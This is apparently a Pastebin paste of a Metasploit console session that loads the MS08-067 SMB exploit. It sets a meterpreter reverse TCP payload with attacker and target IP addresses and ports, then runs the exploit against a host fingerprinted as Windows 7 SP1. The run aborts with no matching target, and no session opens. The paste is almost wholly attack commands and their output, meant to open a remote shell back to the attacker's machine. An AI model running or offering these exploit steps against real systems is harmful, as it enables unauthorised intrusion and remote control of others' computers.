Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf > use windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
- lhost => 192.168.0.104
- msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
- rhost => 192.168.0.105
- msf exploit(ms08_067_netapi) > set lport 4444
- lport => 4444
- msf exploit(ms08_067_netapi) > set rport 445
- rport => 445
- msf exploit(ms08_067_netapi) > exploit
- [*] Started reverse TCP handler on 192.168.0.104:4444
- [*] Automatically detecting the target...
- [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
- [*] We could not detect the language pack, defaulting to English
- [-] Exploit aborted due to failure: no-target: No matching target
- [*] Exploit completed, but no session was created.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement